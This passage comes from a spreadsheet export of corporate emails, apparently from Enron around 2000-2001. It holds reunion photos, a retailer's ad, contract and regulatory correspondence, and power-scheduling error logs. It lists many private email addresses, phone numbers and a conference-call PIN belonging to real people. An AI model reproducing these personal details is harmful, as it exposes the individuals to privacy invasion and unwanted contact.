'carls@frontier.net', 'jha007@aol.com', 'becker@gilanet.com', 'isleskye@excite.com', 'panmetro@aol.com', 'elnino52@concentric.net', 'mcrl@yahoo.com', 'ilahjo@flash.net', 'nmbagpipes@msn.com', 'rorbevan@aol.com', 'eleonard@msig-nm.com', 'gracialaursen@worldnet.att.net', 'lungecutoff@hotmail.com', 'vanjeanell@aol.com', 'sandradougwagner@cs.com', 'donieo@bellatlantic.net', 'mdvogel@sandia.gov', 'tlinton51@aol.com', 'doddball@aol.com', 'ppeixotto@cbrichardellis.com', 'ljcleve@uswest.net', 'idauphin@mathisisd.esc2.net', 'rb_bird@yahoo.com', 'sandwedge@visto.com', 'd__m@hotmail.com', 'enchantedftn@aol.com', 'dmharv@aol.com', 'happyraccoons@mciworld.com', 'leslie.john@mayo.edu', 'anagram@inetport.com', 'jkstauffer@imcglobal.com', 'rking@hess.com', 'dmf12ga@aol.com', 'ebrass@ix.netcom.com', 'ojreynolds@aol.com', 'mjhj2@aol.com', 'ganixter@aol.com', 'bbb@unidial.com', 'gilaqueen@worldnet.att.net', 'lindamack@dellnet.com', 'pammartin@visto.com', 'for1205@aol.com', 'msherbring@salud.unm.edu', 'billys1033@aol.com', 'charlie4@erols.com', 'pam@golfngals.com'})</t>
  </si>
  <si>
    <t>Fw: SHS reunion pics</t>
  </si>
  <si>
    <t>Here are some of the pics Diane Rich-Teague  sent.? I hope to have more out _x000D_
to everyone soon.? If you have pics,  please email them.? Also there are a _x000D_
few email additions and  changes:_x000D_
?_x000D_
??? change Steve Peterson  to:? Goldw1202@aol.com_x000D_
??? change John Buynak to:?  John.buynak@verizon.net_x000D_
??? add Onalee  Weleck-Reynolds:? ojreynolds@aol.com_x000D_
?_x000D_
Hope this finds you all well.? Keep in  touch.? God bless you &amp; go vote _x000D_
tomorrow...Diane_x000D_
(It's not too late to order a  video.)_x000D_
 - cheerleaders3.jpg_x000D_
 - di&amp;dar.jpg_x000D_
 - di&amp;molly&amp;deb&amp;jackie.jpg_x000D_
 - di&amp;nik&amp;dar.jpg_x000D_
 - thegirls.jpg</t>
  </si>
  <si>
    <t>Wed, 28 Nov 2001 09:13:28 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'c.measom@tjmhou.com'})</t>
  </si>
  <si>
    <t>We Come to You with Holiday Gift Ideas</t>
  </si>
  <si>
    <t xml:space="preserve">(If you cannot see the images in this message, click here &lt;http://www.tomjamesco.com/webviewcl.asp?slsprof=05568&amp;cust=0185000201&amp;type=C&gt; to view directly on our web site.)_x000D_
_x000D_
	_x000D_
  &lt;http://www.tomjamesco.com/Pics/logo.gif&gt;	  &lt;http://www.tomjamesco.com/Pics/wcty.gif&gt;	  &lt;http://www.tomjamesco.com/Pics/crest2.gif&gt;	_x000D_
  &lt;http://www.tomjamesco.com/Pics/webblue.gif&gt;	Home &lt;http://www.tomjamesco.com/defaultr.asp&gt;	 Products &lt;http://www.tomjamesco.com/productsr.asp&gt;	 History &lt;http://www.tomjamesco.com/aboutr.asp&gt;	 Careers &lt;http://www.tomjamesco.com/opportunity/defaultr.asp&gt;	 Contact &lt;http://www.tomjamesco.com/contactusr.asp&gt;	 _x000D_
We Come to You with Holiday Gift Ideas!	   &lt;http://www.tomjamesco.com/Pics/tree.gif&gt;	_x000D_
Never have enough time for holiday shopping?  Let Tom James solve your gift dilemma in the comfort and convenience of your home or office.  A visit from a Tom James Sales Professional saves you precious time - and that's a gift you deserve this year! 	_x000D_
  _____  _x000D_
_x000D_
 &lt;http://www.tomjamesco.com/catalog/evening/page22.asp&gt;	  &lt;http://www.tomjamesco.com/catalog/business/page4.asp&gt;	  &lt;http://www.tomjamesco.com/catalog/business/page2.asp&gt;	  &lt;http://www.tomjamesco.com/catalog/evening/page20.asp&gt;	 _x000D_
Cashmere Sweaters &lt;http://www.tomjamesco.com/catalog/evening/page22.asp&gt;	 Cotton Ribbed Polos &lt;http://www.tomjamesco.com/catalog/business/page4.asp&gt;	 Wool Polos &lt;http://www.tomjamesco.com/catalog/business/page2.asp&gt;	 Basket Weave Polo Sweaters &lt;http://www.tomjamesco.com/catalog/evening/page20.asp&gt;	 _x000D_
 	  	  	  	 _x000D_
 &lt;http://www.tomjamesco.com/Accessories/essentials/page63b.asp&gt;	  &lt;http://www.tomjamesco.com/catalog/outerwear/page48.asp&gt;	  &lt;http://www.tomjamesco.com/catalog/outerwear/page49.asp&gt;	  &lt;http://www.tomjamesco.com/catalog/evening/page23.asp&gt;	 _x000D_
Monogrammed Cufflinks &lt;http://www.tomjamesco.com/Accessories/essentials/page63b.asp&gt;	 Lambskin Blazer &lt;http://www.tomjamesco.com/catalog/outerwear/page48.asp&gt;	 Lambskin Zip Front Jacket &lt;http://www.tomjamesco.com/catalog/outerwear/page49.asp&gt;	 Cashmere Placket Sweaters &lt;http://www.tomjamesco.com/catalog/evening/page23.asp&gt;	 _x000D_
 	  	  	  	 _x000D_
 &lt;http://www.tomjamesco.com/catalog/outerwear/page46.asp&gt;	  &lt;http://www.tomjamesco.com/swatchbox.asp&gt;	  &lt;http://www.tomjamesco.com/giftcertificate.asp&gt;	  &lt;http://www.tomjamesco.com/catalog/outerwear/page44.asp&gt;	 _x000D_
Twill Microfibre Raincoats &lt;http://www.tomjamesco.com/catalog/outerwear/page46.asp&gt;	 Swatch Box &lt;http://www.tomjamesco.com/swatchbox.asp&gt;	 Gift Certificate &lt;http://www.tomjamesco.com/giftcertificate.asp&gt;	 Cashmere Topcoats &lt;http://www.tomjamesco.com/catalog/outerwear/page44.asp&gt;	 _x000D_
 	  	  	  	 _x000D_
  _____  _x000D_
_x000D_
_x000D_
Carol Measom &lt;http://www.tomjamesco.com/asp/biopager.asp?empidn=05568&gt;, Professional Clothier   (713) 622-5678_x000D_
_x000D_
_x000D_
_x000D_
To sign up for an appointment click here &lt;http://www.tomjamesco.com/guestbookr.asp?slsprof=05568&amp;cust=0185000201&gt;.	_x000D_
To receive future messages in text-only format click here &lt;http://www.tomjamesco.com/asp/mailoptionsr.asp?option=text&amp;cust=0185000201&gt;.	_x000D_
If you do not wish to receive this type of message click here &lt;http://www.tomjamesco.com/asp/mailoptionsr.asp?option=stop&amp;cust=0185000201&gt;.	_x000D_
Order sportswear &lt;http://www.tomjamesco.com/catalog/catalogr.asp&gt;, accessories &lt;http://www.tomjamesco.com/accessories/accessoriesr.asp&gt; or ready-to-wear &lt;http://www.tomjamesco.com/readymade/readymader.asp&gt; online with your VIP Client Number: 0185000201	_x000D_
_x000D_
	? 2001 The Tom James Company - All Rights Reserved	   &lt;http://www.tomjamesco.com/pics/footercurve.gif&gt;	</t>
  </si>
  <si>
    <t>Wed, 18 Jul 2001 00:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'shieldsenron@aol.com'})</t>
  </si>
  <si>
    <t>Reminder letter for California filing deadline</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 - dasovich.rl.ca.7-17-01.doc </t>
  </si>
  <si>
    <t>Wed, 9 May 2001 10:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'misty.barrett@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'vladimir.gorny@enron.com', 'rogers.herndon@enron.com', 'tim.belden@enron.com', 'don.black@enron.com', 'berney.aucoin@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>Re: Questionnaire</t>
  </si>
  <si>
    <t xml:space="preserve">As requested below, attached is the contract review questionnaire:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Wade Stubblefield_x000D_
05/09/2001 04:31 PM_x000D_
To: Misty Barrett/HOU/EES@EES_x000D_
cc: Rogers Herndon/HOU/ECT@ect, Don Black/HOU/EES@EES, Tim _x000D_
Belden/Enron@EnronXGate, Kevin M Presto/HOU/ECT@ECT, Vladimir _x000D_
Gorny/Enron@EnronXGate, Wes Colwell/Enron@EnronXGate, Berney C _x000D_
Aucoin/HOU/ECT@ECT _x000D_
Subject: Questionnaire_x000D_
_x000D_
Misty,_x000D_
_x000D_
Can you please send the cc'd individuals above the complete contract review _x000D_
questionnaire for their review and information._x000D_
_x000D_
Also, can you have a brief (15-30 minute) meeting set up with Berney Aucoin _x000D_
and Vladimir Gorny to walk through the database functionality as it exists _x000D_
today.  It will probably be several weeks before that aspect of the project _x000D_
if more fully addressed, but I want them to at least be familiar with where _x000D_
we are today and what additional questions we might have about _x000D_
functionality.  You should probably make sure that the IT programmer is _x000D_
present at the meeting._x000D_
_x000D_
Thanks_x000D_
_x000D_
Wade _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2000 04:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Mom's b-day</t>
  </si>
  <si>
    <t xml:space="preserve">I thought you'd appreciate this email from my brother.  It's the best family _x000D_
email I've gotten lately.  I'm such a great sister...I bought the present, _x000D_
wrapped the present (or at least watched while the clerk wrapped it), and _x000D_
delivered it to my mom for her birthday, and I was nice enough to put my _x000D_
brother's name on the gift.  _x000D_
_x000D_
RR_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Robin Rodrigue/HOU/ECT on 08/30/2000 _x000D_
11:32 AM ---------------------------_x000D_
_x000D_
_x000D_
"Paul Rodrigue" &lt;paul.rodrigue@trin.net&gt; on 08/29/2000 03:41:28 PM_x000D_
To: Robin.Rodrigue@enron.com_x000D_
cc:  _x000D_
Subject: Mom's b-day_x000D_
_x000D_
_x000D_
Mom call the other day and thanked me for her present. What did I get her?_x000D_
_x000D_
Paul_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 07:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Houston Move</t>
  </si>
  <si>
    <t>I am wondering if you know which moving company Enron uses to move people to _x000D_
Houston. Despite the fact that I haven't seen the formal offer I think I _x000D_
should book a  mover so I don't get stuck. Let me know if you know or if _x000D_
there is someone in Houston I should talk to (Jennifer?). _x000D_
_x000D_
Thanx,_x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>Wed, 28 Nov 2001 10:59:14 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Cash needs</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Howard, Kevin A. _x000D_
Sent: Wednesday, November 28, 2001 12:59 PM_x000D_
To: Geaccone, Tracy_x000D_
Subject: Cash needs_x000D_
_x000D_
_x000D_
What is our cash needs over the week to ten days? Ned for mcmahon meeting at 1._x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 06:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Salmon Incumbency Certificate</t>
  </si>
  <si>
    <t>Kay:_x000D_
_x000D_
Per our conversation, a revised Secretary's Certificate is enclosed._x000D_
_x000D_
Carolyn M. Campbell_x000D_
King?&amp; Spalding_x000D_
713-276-7307 (phone)_x000D_
713-751-3280 (fax)_x000D_
ccampbell@kslaw.com &lt;mailto:ccampbell@kslaw.com&gt;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 NY003700898.DOC</t>
  </si>
  <si>
    <t>Sun, 13 Jan 2002 03:56:41 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/13/02; HourAhead hour: 6;  HourAhead schedule download failed. Manual intervention required.</t>
  </si>
  <si>
    <t>Mon, 24 Jan 2000 12:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Project Eval Form</t>
  </si>
  <si>
    <t xml:space="preserve">guys, here's that info sheet we discussed._x000D_
---------------------- Forwarded by Scot Chambers/ENRON_DEVELOPMENT on _x000D_
01/24/2000 08:13 PM ---------------------------_x000D_
_x000D_
_x000D_
Kirk McDaniel_x000D_
10/22/99 05:19 PM_x000D_
To: Scot Chambers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Project Eval Form_x000D_
_x000D_
Scot_x000D_
_x000D_
As per your request._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 12:22:44 -0800 (PST)</t>
  </si>
  <si>
    <t>*CANCELLED* ECS 4102 - Commercialization Meeting - SBeck, BHall,_x000D_
 BSuperty, TBusby, SGandhi-Gupta</t>
  </si>
  <si>
    <t xml:space="preserve">Monday wkly meeting - if occurs on HOLIDAY, will be on Tuesday same time. </t>
  </si>
  <si>
    <t>Wed, 13 Jun 2001 05:54:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: ESBI Review of Export Levels ( OP-333 Review)</t>
  </si>
  <si>
    <t xml:space="preserve">Does this information reflect the additions of the IBOC or not? Otherwise the info seems to be what is going on right now._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hemstock, Robert  _x000D_
Sent:	Tuesday, June 12, 2001 8:57 PM_x000D_
To:	Zufferli, John; Greenizan, Bill; Davies, Derek_x000D_
Subject:	ESBI Review of Export Levels ( OP-333 Review)_x000D_
_x000D_
Attached is what is apparently a revised export level chart that discloses export levels relative to intra-Alberta load.  Are we in a position to agree/disagree with these figures and/or provide any comments back to EAL? _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Churchill-Brown, Jennifer" &lt;Jennifer.Churchill-Brown@eal.ab.ca&gt;@ENRON [mailto:IMCEANOTES-+22Churchill-Brown+2C+20Jennifer+22+20+3CJennifer+2EChurchill-Brown+40eal+2Eab+2Eca+3E+40ENRON@ENRON.com] _x000D_
Sent:	Tuesday, June 12, 2001 3:25 PM_x000D_
To:	Churchill-Brown, Jennifer; 'Cheryl.Runge@powerpool.ab.ca'; 'dmacnamara@home.com'; 'brian.bullen@candelaenergy.com'; 'christopher_mcdowall@transalta.com'; 'Garyh@encoreenergy.com'; 'gkmacintyre@duke-energy.com'; 'hly@enmax.com'; Zufferli, John; 'pbartsch@utilicorp.com'; 'wayne_oconnor@transcanada.com'; Hemstock, Robert; 'ksdukart@duke-energy.com'; 'Anita Lee'; Bert Adam (E-mail); Bob Low (E-mail); Byron Dudley (E-mail); Dale Mitchell (E-mail); Don Adair (E-mail); Doug Hincks (E-mail); Doug Little (E-mail); Doug Smeall (E-mail); Geoff Wagner (E-mail); Glen Sutton (E-mail); Jim Balshaw (E-mail); Jim Capp (E-mail); Ken Willis (E-mail); Kevin Berg (E-mail); Kevin Billinton (E-mail); Kim Logan (E-mail); Ligong Gan (E-mail); Mike Asgar-Deen (E-mail); Mike MacDougall (E-mail); Mike Windsor (E-mail); Nigel T. J. Pimblett (E-mail); Otto Lenz (E-mail); Peter Schubert (E-mail); Randy Rowland (E-mail); Taras J. Konowalec (E-mail); Tony Rutkunas (E-mail); Vipin Prasad (E-mail)_x000D_
Cc:	Ritter, Fred; Baker, Rob; Johnson, Katie_x000D_
Subject:	RE: OP-333 Review_x000D_
_x000D_
Dear All,_x000D_
_x000D_
In keeping with work-overload-tradition the wrong attachment was added to_x000D_
the previous email (below).  Attached is the table discussed in the email_x000D_
sent out earlier this afternoon._x000D_
_x000D_
   &lt;&lt;op-333-update.xls&gt;&gt;_x000D_
Please accept our apologies for this inconvenience._x000D_
_x000D_
Jennifer M. Churchill-Browne_x000D_
Engineering Clerk_x000D_
ESBI Alberta Ltd._x000D_
Phone: 403-705-5264_x000D_
Fax: 403-266-2128_x000D_
Email: jennifer.churchill-brown@eal.ab.ca_x000D_
For the latest information from Alberta's Transmission Administrator, visit_x000D_
our web site at www.eal.ab.ca_x000D_
_x000D_
_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	Churchill-Brown, Jennifer_x000D_
&gt; Sent:	Tuesday, June 12, 2001 3:14 PM_x000D_
&gt; To:	'Cheryl.Runge@powerpool.ab.ca'; 'dmacnamara@home.com';_x000D_
&gt; 'brian.bullen@candelaenergy.com'; 'christopher_mcdowall@transalta.com';_x000D_
&gt; 'Garyh@encoreenergy.com'; 'gkmacintyre@duke-energy.com'; 'hly@enmax.com';_x000D_
&gt; 'John.Zufferli@enron.com'; 'pbartsch@utilicorp.com';_x000D_
&gt; 'wayne_oconnor@transcanada.com'; 'robert.hemstock@enron.com';_x000D_
&gt; 'ksdukart@duke-energy.com'; Anita Lee; Bert Adam (E-mail); Bob Low_x000D_
&gt; (E-mail); Byron Dudley (E-mail); Dale Mitchell (E-mail); Don Adair_x000D_
&gt; (E-mail); Doug Hincks (E-mail); Doug Little (E-mail); Doug Smeall_x000D_
&gt; (E-mail); Geoff Wagner (E-mail); Glen Sutton (E-mail); Jim Balshaw_x000D_
&gt; (E-mail); Jim Capp (E-mail); Ken Willis (E-mail); Kevin Berg (E-mail);_x000D_
&gt; Kevin Billinton (E-mail); Kim Logan (E-mail); Ligong Gan (E-mail); Mike_x000D_
&gt; Asgar-Deen (E-mail); Mike MacDougall (E-mail); Mike Windsor (E-mail);_x000D_
&gt; Nigel T. J. Pimblett (E-mail); Otto Lenz (E-mail); Peter Schubert_x000D_
&gt; (E-mail); Randy Rowland (E-mail); Taras J. Konowalec (E-mail); Tony_x000D_
&gt; Rutkunas (E-mail); Vipin Prasad (E-mail)_x000D_
&gt; Cc:	Ritter, Fred; Baker, Rob; Johnson, Katie_x000D_
&gt; Subject:	OP-333 Review_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Review of EAL Policy OP-333_x000D_
&gt;_x000D_
&gt; ESBI Alberta Ltd (EAL) and the Power Pool of Alberta (PPoA) have, upon_x000D_
&gt; request, reviewed the Alberta to BC Hydro export transfer levels.  The_x000D_
&gt; levels, shown on the curve in TA-OP 333 on page 13, and tabulated by the_x000D_
&gt; PPoA in POB - 12, have been reviewed to more accurately reflect transfer_x000D_
&gt; levels and show a smoother transition especially at the lower end of the_x000D_
&gt; export curve at 150 MW.  The review does not show transfer levels which_x000D_
&gt; deviate from the curve published in OP-333 and does not reflect any new_x000D_
&gt; information regarding the interconnection to BC Hydro._x000D_
&gt;_x000D_
&gt; Confirmation is required from stakeholders, and we request a response by_x000D_
&gt; 2001-06-19 to opsdata@eal.ab.ca   Any questions regarding the policy_x000D_
&gt; should be directed to either Robert Baker or Fred Ritter._x000D_
&gt;_x000D_
&gt;  &lt;&lt; File: OP-333_Final.doc &gt;&gt;_x000D_
&gt;_x000D_
&gt; Jennifer M. Churchill-Browne_x000D_
&gt; Engineering Clerk_x000D_
&gt; ESBI Alberta Ltd._x000D_
&gt; Phone: 403-705-5264_x000D_
&gt; Fax: 403-266-2128_x000D_
&gt; Email: jennifer.churchill-brown@eal.ab.ca_x000D_
&gt; For the latest information from Alberta's Transmission Administrator,_x000D_
&gt; visit our web site at www.eal.ab.ca_x000D_
&gt;_x000D_
_x000D_
 - op-333-update.xls &lt;&lt; File: op-333-update.xls &gt;&gt; </t>
  </si>
  <si>
    <t>Fri, 22 Dec 2000 07:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Pete,_x000D_
_x000D_
We may have a conference call with ABB on Wednesday.  Would you or Chris be _x000D_
able to call in?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
THANKS and Merry Christmas!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Thompson, Peter J." &lt;peterthompson@akllp.com&gt; on 12/22/2000 03:49:28 PM_x000D_
To: "Kay Mann (E-mail)" &lt;kay.mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Happy Holidays_x000D_
_x000D_
I spoke to Suzanne Adams earlier.  She said that she had all of the_x000D_
documents and was inserting Exhibit H-2.  Hope the closings went well._x000D_
I will be taking a lap top with me and checking my voice mail at least_x000D_
twice a day if you should need me.  I'll be back in the office on_x000D_
January 3rd.  Have a fun time in Austin._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 04:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>They are pretty well known here and are pretty expensive.  Their store is in _x000D_
a very nice area of houston.  Should be ok._x000D_
PL</t>
  </si>
  <si>
    <t>Thu, 20 Jan 2000 05:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">The vacation time looks good to me.  My trip is nowhere near final yet so _x000D_
let's hold off on rescheduling the credit group lunch._x000D_
_x000D_
Don't come back until you're well!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carol St Clair_x000D_
01/20/2000 01:21 PM_x000D_
To: Mark Taylor/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Vacation Days  _x000D_
_x000D_
Mark:_x000D_
The credit group lunch is scheduled for the 18th of February.  Do I need to _x000D_
reschedule?  Also, were you okay with my vacation request of March 22-24th?  _x000D_
I hope to be back in the office tomorrow although I have signed up for a CLE _x000D_
seminar at the Hyatt._x000D_
Carol_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 17:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/12/01; HourAhead hour: 1;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/12/01; HourAhead hour: 1;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1201.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 1 / Preferred:  47.00 / Final:  46.99)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTstSW_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/12/01_x000D_
  TIE_POINT: MEAD_2_WALC_x000D_
  INTERCHG_ID: EPMI_CISO_8000_x000D_
  ENGY_TYPE: WHEEL_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 1 / Preferred:  12.00 / Final:  11.98)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/12/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_DODGERS_x000D_
  ENGY_TYPE: WHEEL_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 1 / Preferred:  43.60 / Final:  43.57)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE3_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/12/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 03:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 11/16/00 11:04 AM -----_x000D_
_x000D_
=09Executive Compensation@ENRON_x000D_
=09Sent by: Enron Announcements@ENRON_x000D_
=0911/14/00 07:17 PM_x000D_
=09=09=20_x000D_
=09=09 To: Eligible Employees_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Deferral Enrollment 2001_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                                              =20_x000D_
_x000D_
Good news!  Deferral program enrollment begins Wednesday, November 15, 2000=_x000D_
. =20_x000D_
 Enron's Bonus Stock Option and Bonus Phantom Stock Programs provide you wi=_x000D_
th=20_x000D_
an opportunity to receive stock options and phantom stock in lieu of all or=_x000D_
 a=20_x000D_
portion of the cash bonus you may receive during 2001.   To make enrollment=_x000D_
=20_x000D_
even more convenient for you, this year's deferral program information is=_x000D_
=20_x000D_
available on eHRonline. =20_x000D_
_x000D_
To learn more about your deferral program opportunities and to enroll for=_x000D_
=20_x000D_
2001 deferrals, access eHRonline at http://ehronline.enron.com.  (Call the=_x000D_
=20_x000D_
ISC Help Desk at 713-345-4727 if you need your ID or password to access the=_x000D_
=20_x000D_
system.)_x000D_
_x000D_
1. Review the program descriptions (attached to the Election Form) before y=_x000D_
ou=20_x000D_
make your elections._x000D_
2. If you decide to defer compensation, complete the Election Form before=_x000D_
=20_x000D_
Friday, December 8,  2000 (the enrollment deadline)._x000D_
3. Print your 2001 Election Form and Confirmation Statement right from the=_x000D_
=20_x000D_
web site and you=01,re   finished!=20_x000D_
_x000D_
Sound easy?  It is!_x000D_
_x000D_
DEFERRAL ENROLLMENT 2001--ADDED VALUE FOR YOUR FUTURE_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Sep 2001 13:58:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Regulatory Report</t>
  </si>
  <si>
    <t>Tammy --_x000D_
_x000D_
I sent this report to John and Louise last week.  Intend to make it monthly.  Similar to earlier.  I will include you on it going forward.  Sent to John's asst.  Call with any questions._x000D_
_x000D_
Jim_x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shepperd, Tammy R.  _x000D_
Sent:	Tuesday, September 18, 2001 2:05 PM_x000D_
To:	Steffes, James D._x000D_
Subject:	Regulatory Report_x000D_
Importance:	High_x000D_
_x000D_
Jim, _x000D_
I know you guys have been busy beyond belief so I haven't had the heart to contact you about the report.  However, Louise is anxious to put a process back in place for the Office of the Chair update book.  _x000D_
_x000D_
Would you kindly let me know if you could pull one together in the near future and what the frequency ought to be (monthly/bi-monthly)?_x000D_
_x000D_
Thank you, _x000D_
Tammy</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 07:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Kim,_x000D_
 Please review this draft.  I have not modified any language from the Enfolio _x000D_
to that contained in the draft of their form of contract which you forwarded _x000D_
to me last week.  I will read their long form and see if it makes sense to _x000D_
include their language.  Remember, in their short form, they had language for _x000D_
short breaks which was slightly diffent from ours but with a little torture, _x000D_
we could have incorporated their language once we got over the hurdle that we _x000D_
can't agree to let them audit our contracts,  which means we could never show _x000D_
them what we got for the default quantity._x000D_
</t>
  </si>
  <si>
    <t>frozenset({'robert.hall@enron.com', 'sally.beck@enron.com'})</t>
  </si>
  <si>
    <t>PP&amp;E and CWIP Protocol for HPL Transition</t>
  </si>
  <si>
    <t xml:space="preserve">Sally,_x000D_
_x000D_
FYI - here is what Jim is using for the Accounting activities._x000D_
_x000D_
Brian_x000D_
---------------------- Forwarded by Brian Redmond/HOU/ECT on 04/02/2001 05:43 _x000D_
PM ---------------------------_x000D_
From: Jim Coffey on 04/02/2001 02:58 PM_x000D_
To: Brian Redmond/HOU/ECT@ECT, Deanna Washington/Enron@EnronXGate, Emma Kam _x000D_
Welsch/HOU/ECT@ECT, Vince Mack/Enron@EnronXGate, Marian _x000D_
Bryant/Enron@EnronXGate, Anne C Koehler/HOU/ECT@ECT, Sandi M _x000D_
Braband/HOU/ECT@ECT, Troy Denetsosie/HOU/ECT@ECT, Steve -HPL- _x000D_
Schneider/HOU/ECT@ECT, Yvette Miroballi/Enron@EnronXGate, Rick _x000D_
Boehm/Enron@enronXgate, Nathan L Hlavaty/HOU/ECT@ECT_x000D_
cc: Kedar Kulkarni/Enron@EnronXGate _x000D_
Subject: PP&amp;E and CWIP Protocol for HPL Transition  _x000D_
_x000D_
Please review the attached PP&amp;E and CWIP Protocol for the HPL transition and _x000D_
respond with any suggested changes ASAP.  I would like to send this to AEP by _x000D_
tomorrow if at all possible.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Also attached below are the files with the List of Asset Master Data Elements _x000D_
referred to in the Protocol which will be attached to the Protocol._x000D_
_x000D_
CWIP_x000D_
_x000D_
_x000D_
PP&amp;E_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 18 Oct 2000 04:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CPUC Investigation call 1-800-998-2462 / pin #4699545</t>
  </si>
  <si>
    <t>The rough agenda is as follows:_x000D_
1. Update on conversations with CPUC attorneys (Fergus and Day)_x000D_
2. Update on status of other companies' responses to CPUC subpoena_x000D_
3. Update on compilation of trading data to be provided to CPUC (Fergus, _x000D_
Yoder, Hain, Smith, Aamodt)_x000D_
4. Legal analysis regarding Enron's objection to specific requests and to _x000D_
CPUC jurisdiction (Day, Fergus, Watkiss)_x000D_
5. Assignment of tasks to be accomplished</t>
  </si>
  <si>
    <t>Tue, 18 Sep 2001 08:51:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: DSI Chart</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Swerzbin, Mike _x000D_
Sent: Tuesday, September 18, 2001 10:12 AM_x000D_
To: Grigsby, Mike_x000D_
Subject: FW: DSI Chart_x000D_
_x000D_
_x000D_
Here's a look at where the Aluminum Cos in the Northwest stand currently-  from our consultant_x000D_
-----Original Message-----_x000D_
From: Rosman, Stewart _x000D_
Sent: Monday, September 17, 2001 3:57 PM_x000D_
To: Belden, Tim; Swerzbin, Mike; Crandall, Sean; Scholtes, Diana_x000D_
Subject: FW: DSI Chart_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Randy Hardy [mailto:rhardy@hardyenergy.com]_x000D_
Sent: Monday, September 17, 2001 3:27 PM_x000D_
To: Rosman, Stewart_x000D_
Cc: Malowney, John_x000D_
Subject: DSI Chart_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
Date:          September 17, 2001_x000D_
_x000D_
From:         Randy Hardy, Hardy Energy Consulting_x000D_
_x000D_
To:              Stewart Rosman, Enron North America_x000D_
_x000D_
		John Malowney, Enron North America_x000D_
_x000D_
		_x000D_
_x000D_
Subject:      DSI Chart_x000D_
_x000D_
